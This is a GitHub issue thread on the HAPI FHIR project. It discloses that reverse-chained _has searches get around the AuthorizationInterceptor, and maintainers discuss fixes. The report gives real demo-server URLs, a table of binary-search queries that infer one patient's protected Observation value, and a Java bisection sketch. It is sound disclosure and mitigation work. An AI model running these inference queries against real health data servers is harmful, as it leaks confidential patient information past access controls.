hapifhir / hapi-fhir

🔥 HAPI FHIR - Java API for HL7 FHIR Clients and Servers
http://hapifhir.io
Apache License 2.0

Potential data security issue in HAPI JPA server AuthorizationInterceptor? #6065

Open mingward opened 3 days ago

mingward commented 3 days ago

Describe the bug: The HAPI FHIR server AuthorizationInterceptor restricts only the resources returned in query results, not the resources that can be used as search criteria. Consequently, a user can craft queries to deduce values in resources they should not be able to access. This leaks protected data.

To Reproduce: Here is an example demonstrating the data leak. Assume that a FHIR server holds two resources: a) Resource "Patient", in which the patient ID has been de-identified twice. For demonstration purposes, we have made this resource public so you can try it. The example URL is: https://dbgap-api.ncbi.nlm.nih.gov/fhir-jpa-small/x1/Patient?&_count=1

b) Resource "Observation" requires authorized access. So, https://dbgap-api.ncbi.nlm.nih.gov/fhir-jpa-small/x1/Observation shows a "denied access" message.

c) Next, we will show that even without authorization to the "Observation" resource, you can still use a set of queries to find out a patient's values in the "Observation" resource for a measurement called "phv00493247.v1.p1".

Step 1: Run the following query: https://dbgap-api.ncbi.nlm.nih.gov/fhir-jpa-small/x1/Patient?_has:Observation:patient?_has:Observation:patient:code-value-quantity=phv00493247.v1.p1$gt3

You will get the 4 patients listed below. A binary search over the threshold value then narrows down one patient's measurement, as the series of queries below shows.

| Query | Patients | What can be deduced |
|---|---|---|
| phv00493247.v1.p1$gt3 | 4 patients: ["3778609", "3778569", "3778606", "3778571"] | |
| phv00493247.v1.p1$gt4 | 0 | All 4 patients' values are in (3, 4] |
| phv00493247.v1.p1$gt3.5 | ["3778571"] | Patient 3778571 has a value in (3.5, 4]. The other 3 patients have values in (3, 3.5]. Continue with binary search. |
| phv00493247.v1.p1$gt3.75 | 0 | Patient 3778571 value in (3.5, 3.75] |
| phv00493247.v1.p1$gt3.625 | 0 | Patient 3778571 value in (3.5, 3.625] |
| phv00493247.v1.p1$gt3.5625 | ["3778571"] | Patient 3778571 value in (3.5625, 3.625] |
| phv00493247.v1.p1$gt3.59375 | 0 | Patient 3778571 value in (3.5625, 3.59375] |
| phv00493247.v1.p1$gt3.578125 | ["3778571"] | Patient 3778571 value in (3.578125, 3.59375] |
| phv00493247.v1.p1$gt3.5859375 | 0 | Patient 3778571 value in (3.578125, 3.5859375] |
| phv00493247.v1.p1$eq3.58 | ["3778571"] | Patient 3778571 value is 3.58 |
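The narrowing in the table can be sketched as an ordinary bisection loop. This is only an illustration and does not call the server: the class name `HasInferenceSketch`, the method `narrow`, and the `DoublePredicate` oracle are hypothetical stand-ins, where each oracle call represents one `_has` search with a `$gt<threshold>` value that reports whether the target patient was returned.

```java
import java.util.function.DoublePredicate;

/** Hypothetical sketch: recovers a hidden value from yes/no "value > x" answers only. */
final class HasInferenceSketch {

    /**
     * Narrows the interval (lo, hi] until it is no wider than tolerance.
     * Assumes the oracle answers true for lo and false for hi.
     */
    static double[] narrow(DoublePredicate greaterThan, double lo, double hi, double tolerance) {
        while (hi - lo > tolerance) {
            double mid = (lo + hi) / 2.0;
            if (greaterThan.test(mid)) {
                lo = mid; // patient still returned, so value > mid
            } else {
                hi = mid; // patient not returned, so value <= mid
            }
        }
        return new double[] {lo, hi};
    }

    public static void main(String[] args) {
        // Stand-in for the protected Observation value; the attacker never reads it directly.
        double hidden = 3.58;
        // Stand-in for one search request with threshold x.
        DoublePredicate oracle = x -> hidden > x;

        double[] bounds = narrow(oracle, 3.0, 4.0, 0.01);
        System.out.println("value in (" + bounds[0] + ", " + bounds[1] + "]");
    }
}
```

Starting from (3, 4] with a tolerance of 0.01, the loop visits the same seven thresholds as the table (3.5 through 3.5859375) and stops at (3.578125, 3.5859375]. Each query halves the interval, so the number of requests grows only with the logarithm of the desired precision.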

Expected behavior: For users with no authorization to Observation, the endpoint should return an error message.


Additional context: In the demonstration above, we assumed that the Patient resource is public. But the same data leak exists if a user is authorized for a set of patients and a set of Observations belonging to StudyA, but not for the Observation entries belonging to StudyB. With the current AuthorizationInterceptor, that user can still deduce the values belonging to StudyB.

To use FHIR for research data, including "controlled access data", it is critically important to prevent such data leaks. Thank you in advance for your attention to this.

jamesagnew commented 3 days ago

Interesting. Do you have any suggestions on what a good fix would be for this issue?

I suppose the simplest solution would be to forbid _has searches whenever the authorization interceptor is in use. A slightly more refined option might be for it to ban them when any kind of compartment-based rule is in place.

jamesagnew commented 3 days ago

Thinking this through a bit more... I guess what we should really be doing is blocking _has if there isn't a rule which allows "global" access to all resources of the source resource type for the _has expression.
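A minimal sketch of that check, in plain Java and independent of the HAPI FHIR API: it collects the source resource type of every `_has` segment in the request's parameter names and allows the search only if all of them are in a set of globally readable types. The class `HasParameterGuard`, its methods, and the `globallyReadableTypes` set are hypothetical names for illustration. How such a set would be derived from the actual AuthorizationInterceptor rules is not covered here.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

/** Hypothetical sketch: decides whether _has parameters may be used in a search. */
final class HasParameterGuard {

    /**
     * Returns the source resource types named by _has parameters.
     * Handles the form _has:<type>:<reference>:<param>, including nested
     * chains such as _has:A:ref:_has:B:ref:param.
     */
    static List<String> sourceTypes(Iterable<String> parameterNames) {
        List<String> types = new ArrayList<>();
        for (String name : parameterNames) {
            String[] parts = name.split(":");
            for (int i = 0; i + 1 < parts.length; i++) {
                if (parts[i].equals("_has")) {
                    types.add(parts[i + 1]); // the segment right after _has is the source type
                }
            }
        }
        return types;
    }

    /** Allows the search only if every _has source type is globally readable by the caller. */
    static boolean isAllowed(Iterable<String> parameterNames, Set<String> globallyReadableTypes) {
        return globallyReadableTypes.containsAll(sourceTypes(parameterNames));
    }
}
```

For example, a caller whose only globally readable type is `Patient` would be refused a search using `_has:Observation:patient:code-value-quantity`, while a search using only `_count` would pass because it names no `_has` source type.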

mingward commented 3 days ago

Thanks. But reverse chained searching is a great feature. Our tech lead has a few suggested fixes.

Of the two fixes mentioned above, the preferred one is the security search narrowing interceptor. It will solve most of the problems faced by most users. It will also share code that can be polished along with the rest of the server and improved over time.

jamesagnew commented 3 days ago

Using SearchNarrowingInterceptor would certainly be an avenue. I haven't thought it through completely, but at first blush I suspect this would mitigate the attack you're describing. I'm not sure I follow the QueryRewritingInterceptor part. You should be able to achieve what you're describing using the stock SearchNarrowingInterceptor today, assuming your security rules are restricting the user to accessing a single patient compartment.